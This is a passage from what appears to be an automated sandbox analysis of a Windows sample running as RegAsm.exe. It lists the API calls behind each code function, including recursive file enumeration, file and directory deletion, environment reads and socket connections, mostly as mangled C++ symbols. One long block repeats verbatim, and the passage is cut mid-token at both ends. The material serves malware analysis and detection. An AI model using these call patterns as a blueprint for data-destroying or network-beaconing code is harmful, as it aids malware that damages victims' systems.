char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_tr2_2_00410586
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocato
r@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,2_2_0040728F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_str
ing@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE2_2_0040477E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00403325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,2_2_00403325
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,2_2_00412BEE
char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_tr2_2_00410586
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocato
r@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,2_2_0040728F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_str
ing@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE2_2_0040477E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00403325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,2_2_00403325
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,2_2_00412BEE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00404C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@AB
V01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,5_2_00404C0A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040751B Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,5_2_0040751B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00410586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@D